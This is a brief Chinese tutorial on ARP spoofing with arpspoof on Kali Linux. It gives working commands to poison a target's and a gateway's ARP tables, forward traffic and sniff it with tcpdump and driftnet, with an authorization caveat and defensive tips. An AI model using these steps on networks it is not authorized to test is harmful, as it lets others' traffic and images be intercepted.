ARP欺骗(ARP Spoofing)的核心是伪造网关与目标设备的MAC地址映射,让流量经过你的Kali主机。请务必仅在自有网络或获得书面授权的环境中测试。
以下是使用 arpspoof(最简单)的标准步骤:
- 开启IP转发(让目标能正常上网,避免断网)
```bash
echo 1 > /proc/sys/net/ipv4/ip_forward
```
- 执行欺骗(需要两个终端窗口)
· 窗口1 - 欺骗目标(告诉目标:我是网关)
```bash
sudo arpspoof -i 网卡名 -t 目标IP 网关IP
```
· 窗口2 - 欺骗网关(告诉网关:我是目标)
```bash
sudo arpspoof -i 网卡名 -t 网关IP 目标IP
```
常用参数替换:-i eth0(你的网卡),-t 192.168.1.100(受害者),192.168.1.1(网关)。
- 验证与抓包
· 查看流量:sudo tcpdump -i eth0 host 目标IP
· 用 driftnet 抓图片,或 bettercap 进行更高级的中间人攻击。
停止欺骗:Ctrl+C 结束两个窗口,系统约30秒后自动恢复ARP表。或执行 ip link set arp off/on 快速重置。
现代防御:HTTPS加密网站(如银行、支付宝)只能抓到乱码,无法获取密码。开启ARP防火墙或使用静态ARP表可防御。